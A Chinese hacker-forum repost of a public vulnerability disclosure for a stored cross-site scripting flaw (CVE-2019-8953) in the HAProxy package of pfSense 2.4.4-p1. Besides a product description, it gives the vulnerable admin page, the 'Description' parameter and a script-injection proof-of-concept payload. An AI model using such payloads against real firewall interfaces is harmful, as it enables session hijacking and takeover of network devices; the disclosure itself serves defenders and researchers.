跳转到帖子

游客您好,欢迎来到黑客世界论坛!您可以在这里进行注册。

赤队小组-代号1949(原CHT攻防小组)在这个瞬息万变的网络时代,我们保持初心,创造最好的社区来共同交流网络技术。您可以在论坛获取黑客攻防技巧与知识,您也可以加入我们的Telegram交流群 共同实时探讨交流。论坛禁止各种广告,请注册用户查看我们的使用与隐私策略,谢谢您的配合。小组成员可以获取论坛隐藏内容!

TheHackerWorld官方

pfSense 2.4.4-p1 (HAProxy Package 0.59_14) - Persistent Cross-Site Scripting

精选回复

发布于
# Exploit Title: pfSense 2.4.4-p1 (HAProxy Package 0.59_14) - Stored Cross-Site Scripting 
# Date: 13.02.2019 
# Exploit Author: Gionathan "John" Reale 
# Vendor Homepage: https://www.pfsense.org 
# Version: 2.4.4-p1/0.59_14 
# Software Link: N/A
# Google Dork: N/A
# CVE:2019-8953 

################################################################################################################################## 
Introduction pfSense® software is a free, open source customized distribution of FreeBSD specifically tailored for use as a firewall and router that is entirely managed via web interface. 
In addition to being a powerful, flexible firewalling and routing platform, it includes a long list of related features and a package system allowing further expandability without adding bloat and potential security vulnerabilities to the base distribution. 
HAProxy is free, open source software that provides a high availability load balancer and proxy server for TCP and HTTP-based applications that spreads requests across multiple servers. 
################################################################################# 

Example: URL https://192.168.1.1/haproxy/haproxy_listeners_edit.php 
PARAMETER Description 
PAYLOAD "><script>alert("test")</script>
            

创建帐户或登录后发表意见

最近浏览 0

  • 没有会员查看此页面。